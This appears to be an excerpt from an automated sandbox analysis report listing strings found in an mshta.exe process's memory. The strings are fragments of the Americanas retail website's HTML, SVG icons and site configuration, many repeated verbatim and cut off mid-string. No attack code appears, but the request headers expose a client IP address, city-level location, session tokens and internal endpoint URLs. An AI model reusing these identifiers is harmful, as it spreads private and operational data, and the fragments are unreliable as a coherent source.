Source: mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .4-5.3-5.8-8.9-1.1-2.7-2.3-6.8-2.7-14.4-.3-8.2-.4-10.6-.4-31.3 0-20.7.1-23.1.4-31.3.4-7.6 1.6-11.7 2.7-14.4 1.4-3.6 3.1-6.2 5.8-8.9 2.7-2.7 5.3-4.4 8.9-5.8 2.7-1.1 6.8-2.3 14.4-2.7 8.2-.3 10.6-.4 31.3-.4m0-14c-21 0-23.7.1-31.9.5-8.3.4-13.9 1.7-18.8 3.6-5.1 2-9.5 4.6-13.8 8.9-4.3 4.3-6.9 8.7-8.9 13.8C2.2 31.7.9 37.3.5 45.6.1 53.8 0 56.5 0 77.5s.1 23.7.5 31.9c.4 8.3 1.7 13.9 3.6 18.8 2 5.1 4.6 9.5 8.9 13.8 4.3 4.3 8.7 6.9 13.8 8.9 4.9 1.9 10.5 3.2 18.8 3.6 8.2.4 10.9.5 31.9.5s23.7-.1 31.9-.5c8.3-.4 13.9-1.7 18.8-3.6 5.1-2 9.5-4.6 13.8-8.9 4.3-4.3 6.9-8.7 8.9-13.8 1.9-4.9 3.2-10.5 3.6-18.8.4-8.2.5-10.9.5-31.9s-.1-23.7-.5-31.9c-.4-8.3-1.7-13.9-3.6-18.8-2-5.1-4.6-9.5-8.9-13.8-4.3-4.3-8.7-6.9-13.8-8.9-4.9-1.9-10.5-3.2-18.8-3.6C101.2.1 98.5 0 77.5 0m0 37.7c-22 0-39.8 17.8-39.8 39.8 0 22 17.8 39.8 39.8 39.8 22 0 39.8-17.8 39.8-39.8 0-22-17.8-39.8-39.8-39.8zm0 65.6c-14.3 0-25.8-11.5-25.8-25.8s11.5-25.8 25.8-25.8 25.8 11.5 25.8 25.8-11.5 25.8-25.8 25.8zm50.7-67.2c0 5.2-4.2 9.3-9.3 9.3-5.2 0-9.3-4.1-9.3-9.3 0-5.1 4.1-9.3 9.3-9.3 5.1 0 9.3 4.2 9.3 9.3"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://twitter.com/americanas"><svg viewBox="0 0 191 156" aria-labelledby="twitterIcon twitterDesc" fill="#999" width="20px" height="20px"><path d="M190.7 18.5c-7.1 3.1-14.7 5.2-22.5 6.2 8.2-4.9 14.3-12.7 17.2-21.8-7.7 4.6-16.1 7.8-24.8 9.5-12.2-13-31.5-16.1-47.1-7.8C97.9 13 89.9 30.8 94 48.1 62.5 46.5 33.2 31.7 13.3 7.2 2.9 25.1 8.2 48 25.4 59.5c-6.2-.2-12.3-1.9-17.7-4.9-.2 18.8 12.9 35.2 31.4 38.9-3.3.9-6.8 1.3-10.3 1.3-2.5 0-4.9-.2-7.4-.7 5.1 15.9 19.8 26.8 36.5 27.1C44.1 132.1 27 138 9.4 138c-3.2.2-6.3.2-9.4 0 17.9 11.5 38.8 17.6 60.1 17.6 29.5.2 58-11.5 78.9-32.4 20.9-20.9 32.6-49.4 32.4-78.9v-5.1c7.6-5.7 14.2-12.7 19.3-20.7z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.tiktok.com/@americanas"><svg xmlns="http://www.w3.org/2000/svg" width="20px" height="20px" viewBox="0 0 17.376 20" fill="#999"><path d="M9.127.017C10.218 0 11.302.01 12.386 0a5.191 5.191 0 001.458 3.477 5.885 5.885 0 003.533 1.491v3.356a8.853 8.853 0 01-3.5-.807 10.128 10.128 0 01-1.351-.775c-.006 2.435.01 4.867-.016 7.292a6.344 6.344 0 01-1.127 3.285 6.2 6.2 0 01-4.925 2.673 6.064 6.064 0 01-3.4-.856 6.28 6.28 0 01-3.04-4.76 13.89 13.89 0 01-.01-1.24 6.28 6.28 0 017.277-5.571c.017 1.234-.033 2.468-.033 3.7a2.867 2.867 0 00-3.657 1.77 3.313 3.313 0 00-.113 1.341 2.845 2.845 0 005.225 1.052 1.965 1.965 0 00.342-.886c.082-1.491.049-2.975.059-4.466.007-3.36-.01-6.71.016-10.059z" fill="#999"></path></svg></a></li></ul></div></div><div class="src__AddressWrapper-sc-hq16uc-2 cBxbIj"><address class="address__Container-sc-ntruru-0 flQmRN">americanas s.a. / CNPJ: 00.776.574/0006-60 / Inscri equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000002.2774321575.000000000A8B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 6.33-.198.726-.066 1.078.264.682.99 1.012 1.21 1.1l.044.022c.308.132.638.22 1.386.22.374 0 .836-.022 1.408-.088-.11.242-.242.55-.352.726l-.088.154c-.198.396-.968 1.474-2.31 3.212a6.348 6.348 0 00-1.782.066S6.4 17.246 5.85 15.75m1.012 2.772c-.044.11-.176.154-.264.11-.022-.022-.77-.308-1.298-1.034s-.616-1.144-.638-1.188a.203.203 0 11.396-.088s.044.22.286.616l.88 1.012c.286.198.506.308.506.308.132.044.176.154.132.264m-1.078.55c-.044.11-.176.132-.286.088-.022-.022-.726-.396-1.188-1.166-.462-.77-.506-1.188-.506-1.232-.022-.11.066-.22.198-.22.11-.022.22.066.22.198 0 0 .022.22.22.638l.77 1.078c.264.22.484.352.484.352.088.022.132.154.088.264" fill="#FFF"></path></svg><span class="social__AccessbilityText-sc-22330g-2 hDBSXO">tradutor para Libras</span></button><a class="social__KnowMoreLink-sc-22330g-3 iZTAMQ" aria-current="page" href="https://www.americanas.com.br/hotsite/acessibilidade">acessibilidade digital <br/> na Americanas</a><ul class="social-links__Container-sc-1a99ou5-0 kCohPr"><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.youtube.com/CanalAmericanas"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 355 255.1" aria-labelledby="youtubeIcon youtubeDesc" fill="#999" width="25px" height="25px"><path d="M340.5 48.6c-3.9-14.6-15.4-26-29.9-29.9-26.4-7.1-132.3-7.1-132.3-7.1S72.4 11.6 46 18.7C31.5 22.5 20 34 16.1 48.6 9 75 9 130.1 9 130.1s0 55.1 7.1 81.5c3.9 14.6 15.4 26 29.9 29.9 26.4 7.1 132.3 7.1 132.3 7.1s105.9 0 132.3-7.1c14.6-3.9 26-15.4 29.9-29.9 7.1-26.4 7.1-81.5 7.1-81.5s0-55.1-7.1-81.5zm-196 132.3V79.3l88 50.8-88 50.8z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.facebook.com/americanas"><svg viewBox="0 0 77 145" aria-labelledby="facebookIcon facebookDesc" fill="#999" width="20px" height="20px"><path d="M71.3 78.2l3.6-25.4H49.6V36.5c-.8-3.6.3-7.2 2.9-9.7 2.6-2.6 6.3-3.6 9.8-2.8h13.5V1C69.1.3 62.4 0 55.7 0c-9-.4-17.8 3.1-24 9.6-6.3 6.5-9.4 15.3-8.7 24.3v18.9H.9v25.4H23V144h26.6V78.2h21.7z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.instagram.com/americanas"><svg viewBox="0 0 156 156" aria-labelledby="instagramIcon instagramDesc" fill="#999" width="20px" height="20px"><path d="M77.5 14c20.7 0 23.1.1 31.3.4 7.6.4 11.7 1.6 14.4 2.7 3.6 1.4 6.2 3.1 8.9 5.8 2.7 2.7 4.4 5.3 5.8 8.9 1.1 2.7 2.3 6.8 2.7 14.4.3 8.2.4 10.6.4 31.3 0 20.7-.1 23.1-.4 31.3-.4 7.6-1.6 11.7-2.7 14.4-1.4 3.6-3.1 6.2-5.8 8.9-2.7 2.7-5.3 4.4-8.9 5.8-2.7 1.1-6.8 2.3-14.4 2.7-8.2.3-10.6.4-31.3.4-20.7 0-23.1-.1-31.3-.4-7.6-.4-11.7-1.6-14.4-2.7-3.6-1.4-6.2-3.1-8.9-5.8-2.7-2.7-4 equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000002.2774321575.000000000A8B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 6.33-.198.726-.066 1.078.264.682.99 1.012 1.21 1.1l.044.022c.308.132.638.22 1.386.22.374 0 .836-.022 1.408-.088-.11.242-.242.55-.352.726l-.088.154c-.198.396-.968 1.474-2.31 3.212a6.348 6.348 0 00-1.782.066S6.4 17.246 5.85 15.75m1.012 2.772c-.044.11-.176.154-.264.11-.022-.022-.77-.308-1.298-1.034s-.616-1.144-.638-1.188a.203.203 0 11.396-.088s.044.22.286.616l.88 1.012c.286.198.506.308.506.308.132.044.176.154.132.264m-1.078.55c-.044.11-.176.132-.286.088-.022-.022-.726-.396-1.188-1.166-.462-.77-.506-1.188-.506-1.232-.022-.11.066-.22.198-.22.11-.022.22.066.22.198 0 0 .022.22.22.638l.77 1.078c.264.22.484.352.484.352.088.022.132.154.088.264" fill="#FFF"></path></svg><span class="social__AccessbilityText-sc-22330g-2 hDBSXO">tradutor para Libras</span></button><a class="social__KnowMoreLink-sc-22330g-3 iZTAMQ" aria-current="page" href="https://www.americanas.com.br/hotsite/acessibilidade">acessibilidade digital <br/> na Americanas</a><ul class="social-links__Container-sc-1a99ou5-0 kCohPr"><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.youtube.com/CanalAmericanas"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 355 255.1" aria-labelledby="youtubeIcon youtubeDesc" fill="#999" width="25px" height="25px"><path d="M340.5 48.6c-3.9-14.6-15.4-26-29.9-29.9-26.4-7.1-132.3-7.1-132.3-7.1S72.4 11.6 46 18.7C31.5 22.5 20 34 16.1 48.6 9 75 9 130.1 9 130.1s0 55.1 7.1 81.5c3.9 14.6 15.4 26 29.9 29.9 26.4 7.1 132.3 7.1 132.3 7.1s105.9 0 132.3-7.1c14.6-3.9 26-15.4 29.9-29.9 7.1-26.4 7.1-81.5 7.1-81.5s0-55.1-7.1-81.5zm-196 132.3V79.3l88 50.8-88 50.8z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.facebook.com/americanas"><svg viewBox="0 0 77 145" aria-labelledby="facebookIcon facebookDesc" fill="#999" width="20px" height="20px"><path d="M71.3 78.2l3.6-25.4H49.6V36.5c-.8-3.6.3-7.2 2.9-9.7 2.6-2.6 6.3-3.6 9.8-2.8h13.5V1C69.1.3 62.4 0 55.7 0c-9-.4-17.8 3.1-24 9.6-6.3 6.5-9.4 15.3-8.7 24.3v18.9H.9v25.4H23V144h26.6V78.2h21.7z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.instagram.com/americanas"><svg viewBox="0 0 156 156" aria-labelledby="instagramIcon instagramDesc" fill="#999" width="20px" height="20px"><path d="M77.5 14c20.7 0 23.1.1 31.3.4 7.6.4 11.7 1.6 14.4 2.7 3.6 1.4 6.2 3.1 8.9 5.8 2.7 2.7 4.4 5.3 5.8 8.9 1.1 2.7 2.3 6.8 2.7 14.4.3 8.2.4 10.6.4 31.3 0 20.7-.1 23.1-.4 31.3-.4 7.6-1.6 11.7-2.7 14.4-1.4 3.6-3.1 6.2-5.8 8.9-2.7 2.7-5.3 4.4-8.9 5.8-2.7 1.1-6.8 2.3-14.4 2.7-8.2.3-10.6.4-31.3.4-20.7 0-23.1-.1-31.3-.4-7.6-.4-11.7-1.6-14.4-2.7-3.6-1.4-6.2-3.1-8.9-5.8-2.7-2.7-4 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.2642469328.0000000009A93000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2708989792.0000000009A97000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700415045.0000000009A96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 61a7e617b6b7eb47e55814ca-2a44934d420f61a7e617b6b7eb47e55814ca-04111651075ehttps://www.facebook.com/americanascom equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2709500013.0000000009AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: amento InternoGift cards de plataformas, Apps, jogos e maishttps://www.americanas.com.br/busca/panetonehttps://www.youtube.com/user/CanalAmericanashttps://www.americanas.com.br/busca/pisca-piscaCadastro de Prote equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.2668295079.000000000C103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.2668295079.000000000C103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.2668295079.000000000C103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667308692.000000000C103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667308692.000000000C103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", 